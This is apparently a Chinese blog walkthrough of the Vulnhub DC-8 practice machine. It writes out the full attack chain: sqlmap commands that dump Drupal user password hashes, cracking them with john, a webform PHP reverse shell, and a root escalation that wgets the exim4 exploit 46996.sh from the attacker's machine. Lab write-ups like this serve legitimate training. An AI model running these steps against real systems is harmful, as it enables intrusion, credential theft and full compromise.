Vulnhub靶机DC8渗透测试详解
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
靶机DC8 还是老样子只有拿到root权限才可以发现最终的flag。
Vulnhub靶机下载:
官网地址:
https://download.vulnhub.com/dc/DC-8.zip
Vulnhub靶机安装:
下载好了把安装包解压 然后试用VMware即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用
netdiscover
发现主机
渗透机:kali IP :192.168.0.103 靶机IP :192.168.0.104
使用命令:
nmap -sS -sV -A -n 192.168.0.104
发现开启了
80
端口和
22
端口 访问
192.168.0.104
又是这个熟悉的界面
drupal
点击左侧的
Details
发现url有id 可能存在注入点
Droopescan是一款基于插件的扫描器,可帮助安全研究人员发现Drupal,SilverStripe,Wordpress,Joomla(枚举版本信息和可利用URL地址)和Moodle的问题。
下载安装:
git clone https://github.com/droope/droopescan.git
cd droopescan
pip install -r requirements.txt
./droopescan scan --help
使用工具
droopescan
扫一下后台(因为也是第一次使用所以也是学习了一下)后台地址:
192.168.0.104/user/login
②:暴力破解:
使用
sqlmap
工具即可(也可以手动) 但是工具方便点 直接使用命令:
sqlmap -u http://192.168.0.104/?nid=1 --dbs #列出数据库
sqlmap -u http://192.168.0.104/?nid=1 -D d7db --tables #列出数据库的表
sqlmap -u http://192.168.0.104/?nid=1 -D d7db -T users --columns #列出字段
sqlmap -u http://192.168.0.104/?nid=1 -D d7db -T users -C name,pass -dump #列出账号和密码
获取到
admin
和
john
密码加密后的密文 然后新建一个
pass.txt
把密文放进去使用
john
进行破解 密码:
turtle
然后使用
john
用户登入即可。 发现登入成功!!!
发现
Content
->点击
edit
->点击
WEBFORMS
->点击
Form settings
->点击下拉框选择
PHP code
代码写入保存后,kali监听1234端口,在Contact Us页面随便输入信息点击Submit后,查看kali已得到shell。
写一个python交互 :
python -c 'import pty;pty.spawn("/bin/bash")'
③:提权:
使用find命令查找具有suid权限的命令,找到一个exim4命令,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限
使用
searchsploit
命令搜索
exim
相关漏洞
然后把
46996.sh
拷贝到本地并改名为
666.sh
,并在kali开启http服务
service apache2 start
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 666.sh
cat 666.sh
cp 666.sh /var/www/html
需要进入
/tmp
路径下 (不然没有权限 就下载不了)然后给 一个权限:
chmod 777 666.sh
然后根据脚本提示 进行提权 发现提权失败!!! 可能是格式问题,需要在主机上将脚本格式设置成符合unix格式。然后重新上传和下载
wget 192.168.0.103/666.sh
chmod 777 666.sh
ls -l
④:获取flag:
至此看到了flag,渗透测试结束。
Vulnhub靶机渗透总结:
这是做的第九个靶场了,学习的知识点和一些细节就是 :
1.提权的时候需要设置编码
set: ff=unix
不然会报错(这很重要!!!)
新知识点:
1.学习了
Droopescan
工具的使用
2.学习了
exim4
提权方式
最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助!!